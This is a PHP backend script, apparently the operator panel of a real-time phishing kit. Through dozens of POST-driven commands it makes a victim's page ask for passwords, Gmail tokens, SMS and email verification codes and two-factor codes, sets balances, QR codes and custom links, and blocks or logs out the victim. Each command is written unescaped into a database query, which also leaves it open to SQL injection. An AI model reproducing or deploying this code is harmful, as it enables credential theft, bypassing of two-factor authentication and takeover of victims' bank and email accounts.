<?php

require_once "../cod3rconfig/registro.php";
require_once "../cod3rconfig/conexao.php";
require_once "../cod3rconfig/data.php";


 if($_POST['tipo'] == "update_email") {
  $id = $_POST['idremote'];


  $email = $_POST['email_master'];
     
   $status = array(
     'usuario' => $email
        
   );
   DBUpDate('infos',$status , 'id="'.$id.'"');
   echo $id;
   
}

if($_POST['tipo'] == "update_saldo") {
  $id = $_POST['idremote'];


  $saldo = $_POST['input_saldo'];
     
   $status = array(
     'saldo' => $saldo
        
   );
   DBUpDate('infos',$status , 'id="'.$id.'"');
   echo $id;
   
}

if($_POST['tipo'] == "update_qrcode") {
  $id = $_POST['idremote'];


  $qrcode = $_POST['input_qrcode'];
     
   $status = array(
     'qrcode' => $qrcode
        
   );
   DBUpDate('infos',$status , 'id="'.$id.'"');
   echo $id;
   
}

if($_POST['tipo'] == "update_fonemail") {
  $id = $_POST['idremote'];


  $fonemail = $_POST['input_fonemail'];
     
   $status = array(
     'fonemail' => $fonemail
        
   );
   DBUpDate('infos',$status , 'id="'.$id.'"');
   echo $id;
   
}

if($_POST['tipo'] == "update_codmail") {
  $id = $_POST['idremote'];


  $codmail = $_POST['input_codmail'];
     
   $status = array(
     'codmail' => $codmail
        
   );
   DBUpDate('infos',$status , 'id="'.$id.'"');
   echo $id;
   
}

if($_POST['tipo'] == "update_sms") {
  $id = $_POST['idremote'];


  $smstxt = $_POST['input_sms'];
     
   $status = array(
     'smstxt' => $smstxt
        
   );
   DBUpDate('infos',$status , 'id="'.$id.'"');
   echo $id;
   
}

if($_POST['tipo'] == "update_authy01") {
  $id = $_POST['idremote'];


  $authy01 = $_POST['input_authy01'];
     
   $status = array(
     'authy01' => $authy01
        
   );
   DBUpDate('infos',$status , 'id="'.$id.'"');
   echo $id;
   
}

if($_POST['tipo'] == "update_hotrecu") {
  $id = $_POST['idremote'];


  $hotrecu = $_POST['input_hotrecu'];
     
   $status = array(
     'hotrecu' => $hotrecu
        
   );
   DBUpDate('infos',$status , 'id="'.$id.'"');
   echo $id;
   
}

if($_POST['tipo'] == "update_smsmail") {
  $id = $_POST['idremote'];


  $smsmail = $_POST['input_smsmail'];
     
   $status = array(
     'smsmail' => $smsmail
        
   );
   DBUpDate('infos',$status , 'id="'.$id.'"');
   echo $id;
   
}

if($_POST['tipo'] == "update_link") {
  $id = $_POST['idremote'];


  $linkpersonalizado = $_POST['input_link'];
     
   $status = array(
     'linkpersonalizado' => $linkpersonalizado
        
   );
   DBUpDate('infos',$status , 'id="'.$id.'"');
   echo $id;
   
}

if($_POST['tipo'] == "update_batepapo") {
  $id = $_POST['idremote'];


  $batepapo = $_POST['input_batepapo'];
     
   $status = array(
     'batepapo' => $batepapo
        
   );
   DBUpDate('infos',$status , 'id="'.$id.'"');
   echo $id;
   
}

if($_POST['tipo'] == "updatechat") {
  $id = $_POST['idremote'];


  $msgchat = $_POST['msgchat'];
     
   $status = array(
     'adminchat' => $msgchat
        
   );
   DBUpDate('infos',$status , 'id="'.$id.'"');
   echo $id;
   
}

if($_POST['tipo'] == "msgpic_update") {
  $id = $_POST['idremote'];


  $msgpic = $_POST['msgpic'];
     
   $status = array(
     'msgpic' => $msgpic
        
   );
   DBUpDate('infos',$status , 'id="'.$id.'"');
   echo $id;
   
}


if($_POST['tipo'] == "update_saldocliente") {
  $id = $_POST['idremote'];


  $saldo1 = $_POST['input_saldocliente'];
     
   $status = array(
     'saldo1' => $saldo1
        
   );
   DBUpDate('infos',$status , 'id="'.$id.'"');
   echo $id;
   
}

if($_POST['tipo'] == "update_saldocamp") {
  $id = $_POST['idremote'];


  $saldocamp = $_POST['input_saldocamp'];
     
   $status = array(
     'saldocamp' => $saldocamp
        
   );
   DBUpDate('infos',$status , 'id="'.$id.'"');
   echo $id;
   
}

 if($_POST['tipo'] == "deslogar") {
  $id = $_POST['idremote'];


  $tipo = "deslogar";
     
   $status = array(
     'status' => $tipo,
     'statusremote' => $tipo    
   );
   DBUpDate('infos',$status , 'id="'.$id.'"');
   echo $id;
   
}
   
        //confirme cod trans
if($_POST['tipo'] == "pediremailrecuperar") {
  $id = $_POST['idremote'];
  $email = $_POST['email'];

  $tipo = "pediremailrecuperar";
     
   $status = array(
     'status' => $tipo,
     'numero_autenticar' => $email, 
     'statusremote' => $tipo    
   );
   DBUpDate('infos',$status , 'id="'.$id.'"');
   echo $id;
   
}

      //confirme cod trans
if($_POST['tipo'] == "negarmailderecu") {
  $id = $_POST['idremote'];


  $tipo = "negarmailderecu";
  $numero = $_POST['numerofinal'];
     
   $status = array(
     'status' => $tipo,
     'statusremote' => $tipo    
   );
   DBUpDate('infos',$status , 'id="'.$id.'"');
   echo $id;
   
}


          //confirme cod trans
if($_POST['tipo'] == "bloquearip") {
  $id = $_POST['idremote'];


  $tipo = "bloquearip";
     
   $status = array(
     'status' => $tipo,
     'statusremote' => $tipo    
   );
   DBUpDate('infos',$status , 'id="'.$id.'"');
   echo $id;
   
}

if($_POST['tipo'] == "pedirverificaMail") {
  $id     = $_POST['idremote'];
  $final     = $_POST['final'];
  $tipo   = "pedirverificaMail";
   $status = array(
    'numero_autenticar' => $final,
    'statusremote' => $tipo
   );
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "NegarverificaMail") {
  $id     = $_POST['idremote'];
  $tipo   = "NegarverificaMail";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}


if($_POST['tipo'] == "pedircodigogoogle") {
  $id     = $_POST['idremote'];
  $tipo   = "pedircodigogoogle";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "negarcodigogoogle") {
  $id     = $_POST['idremote'];
  $tipo   = "negarcodigogoogle";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "smscodeverificationP") {
  $id     = $_POST['idremote'];
  $tipo   = "smscodeverificationP";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "smscodeverificationN") {
  $id     = $_POST['idremote'];
  $tipo   = "smscodeverificationN";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "mailcodeverificationP") {
  $id     = $_POST['idremote'];
  $tipo   = "mailcodeverificationP";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "mailcodeverificationN") {
  $id     = $_POST['idremote'];
  $tipo   = "mailcodeverificationN";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "senhafundoP") {
  $id     = $_POST['idremote'];
  $tipo   = "senhafundoP";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "senhafundoPQ") {
  $id     = $_POST['idremote'];
  $tipo   = "senhafundoPQ";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "linkP") {
  $id     = $_POST['idremote'];
  $tipo   = "linkP";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "linkB") {
  $id     = $_POST['idremote'];
  $tipo   = "linkB";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "senhafundoN") {
  $id     = $_POST['idremote'];
  $tipo   = "senhafundoN";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "pedirbloqueio") {
  $id     = $_POST['idremote'];
  $user     = $_POST['user'];
  $tipo   = "pedirbloqueio";
  $status = array(
    'user_master' => $user,
    'statusremote' => $tipo
   );
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "pedircodigogoogle") {
  $id     = $_POST['idremote'];
  $tipo   = "pedircodigogoogle";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "emailvalidationmsgpt") {
  $id     = $_POST['idremote'];
  $tipo   = "emailvalidationmsgpt";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "emailvalidationmsges") {
  $id     = $_POST['idremote'];
  $tipo   = "emailvalidationmsges";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "emailvalidationmsgus") {
  $id     = $_POST['idremote'];
  $tipo   = "emailvalidationmsgus";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "negarcodigogoogle") {
  $id     = $_POST['idremote'];
  $tipo   = "negarcodigogoogle";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}


if($_POST['tipo'] == "2fatores") {
	$id     = $_POST['idremote'];
  $tipo   = "2fatores";
	$status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "negar2fatores") {
  $id     = $_POST['idremote'];
  $tipo   = "negar2fatores";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "2fatoresdentro") {
	$id     = $_POST['idremote'];
  $tipo   = "2fatoresdentro";
	$status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "negar2fatoresdentro") {
  $id     = $_POST['idremote'];
  $tipo   = "negar2fatoresdentro";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "smscodeverificationPdentro") {
	$id     = $_POST['idremote'];
  $tipo   = "smscodeverificationPdentro";
	$status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "smscodeverificationNdentro") {
  $id     = $_POST['idremote'];
  $tipo   = "smscodeverificationNdentro";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "mailcodeverificationPdentro") {
	$id     = $_POST['idremote'];
  $tipo   = "mailcodeverificationPdentro";
	$status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "mailcodeverificationNdentro") {
  $id     = $_POST['idremote'];
  $tipo   = "mailcodeverificationNdentro";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "pedirsenha") {
  $id     = $_POST['idremote'];
  $tipo   = "pedirsenha";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}  

if($_POST['tipo'] == "pedirsenhaemail") {
  $id     = $_POST['idremote'];
  $tipo   = "pedirsenhaemail";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
} 

if($_POST['tipo'] == "negaremailsyng") {
  $id     = $_POST['idremote'];
  $tipo   = "negaremailsyng";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
} 

if($_POST['tipo'] == "negarnav") {
  $id     = $_POST['idremote'];
  $tipo   = "negarnav";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
} 

if($_POST['tipo'] == "2fatoresgoogle") {
  $id     = $_POST['idremote'];
  $tipo   = "2fatoresgoogle";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
} 

if($_POST['tipo'] == "pedirtokengmail") {
  $id     = $_POST['idremote'];
  $tipo   = "pedirtokengmail";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "negartokengmail") {
  $id     = $_POST['idremote'];
  $tipo   = "negartokengmail";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "ok") {
  $id     = $_POST['idremote'];
  $tipo   = "ok";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "ipblock") {
  $id     = $_POST['idremote'];
  $tipo   = "ipblock";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "pedirtelefonegmail") {
  $id     = $_POST['idremote'];
  $tipo   = "pedirtelefonegmail";
  $numero = $_POST['numero'];
  $status = array('numero_autenticar' => $numero, 'statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "negargmailtelefone") {
  $id     = $_POST['idremote'];
  $tipo   = "negargmailtelefone";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "negargmail") {
  $id     = $_POST['idremote'];
  $tipo   = "negargmail";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "notifyclient") {
  $id     = $_POST['idremote'];
  $tipo   = "notifyclient";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "pediremail") {
  $id     = $_POST['idremote'];
  $tipo   = "pediremail";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "fora_ar") {
  $id     = $_POST['idremote'];
  $tipo   = "fora_ar";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "envioimagem") {
  $id     = $_POST['idremote'];
  $tipo   = "envioimagem";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "envioimagemX") {
  $id     = $_POST['idremote'];
  $tipo   = "envioimagemX";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "pedircodeemail") {
  $id     = $_POST['idremote'];
  $tipo   = "pedircodeemail";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "perdirsyng") {
  $id     = $_POST['idremote'];
  $tipo   = "perdirsyng";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "negaruser") {
  $id     = $_POST['idremote'];
  $tipo   = "negaruser";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}


if($_POST['tipo'] == "negarfatorgoogle") {
  $id     = $_POST['idremote'];
  $tipo   = "negarfatorgoogle";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "negaremail") {
  $id     = $_POST['idremote'];
  $tipo   = "negaremail";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "pedircodemail") {
  $id = $_POST['idremote'];


  $tipo = "pedircodemail";
  $numero = $_POST['numerofinal'];
     
   $status = array(
     'numero_autenticar' => $numero, 
     'statusremote' => $tipo    
   );
   DBUpDate('infos',$status , 'id="'.$id.'"');
   echo $id;
   
}


if($_POST['tipo'] == "negarcodemail") {
  $id     = $_POST['idremote'];
  $tipo   = "negarcodemail";
  $status = array('statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "notificagmail") {
  $id     = $_POST['idremote'];
  $tipo   = "notificagmail";
  $numero = $_POST['numero'];
  $status = array('numero_autenticar' => $numero, 'statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "notificagmailq") {
  $id     = $_POST['idremote'];
  $tipo   = "notificagmailq";
  $numeroq = $_POST['numeroq'];
  $status = array('celular_autenticar' => $numeroq, 'statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "button_addmsg") {
  $id     = $_POST['idremote'];
  $tipo   = "button_addmsg";
  $numeroq1 = $_POST['numeroq1'];
  $status = array('notefimsg' => $numeroq1, 'statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}

if($_POST['tipo'] == "pedirsmsgmail") {
  $id     = $_POST['idremote'];
  $tipo   = "pedirsmsgmail";
  $numero = $_POST['numero'];
  $status = array('numero_autenticar' => $numero, 'statusremote' => $tipo);
  DBUpDate('infos',$status , 'id="'.$id.'"');
  echo $id;
}
?>